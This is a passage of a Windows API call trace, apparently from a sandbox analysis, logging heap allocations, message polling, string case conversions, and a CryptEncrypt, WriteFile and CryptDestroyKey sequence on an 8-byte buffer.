Flags=0x0, Size=0x8) returned 0x2a71de8 [0218.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0218.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0218.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0218.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0218.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.518] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74700 | out: hHeap=0x2af0000) returned 1 [0218.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0218.518] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0218.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0218.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.519] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.519] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0218.519] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0218.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0218.520] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0218.520] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.520] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0218.521] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0218.522] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0218.522] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0218.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0218.523] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0218.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.523] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0218.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.523] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.523] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.523] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.523] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.523] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.523] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0218.523] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71eb8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71eb8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0218.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.524] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0218.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.524] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0218.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.524] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0218.524] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.524] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0218.524] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.524] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.524] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.524] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.524] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.525] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.525] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.525] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.525] WriteFile (in: hFile=0x4b0, lpBuffer=0x2a71eb8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71eb8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0218.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.526] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.526] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0218.526] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.526] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0218.526] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.526] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.526] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.526] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0218.526] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.526] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0218.526] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0218.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0218.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab7d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0218.526] CryptDestroyKey (hKey=0x9e1bf8) returned 1 [0218.526] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.526] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.526] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0218.526] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.526] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0218.526] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.527] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, 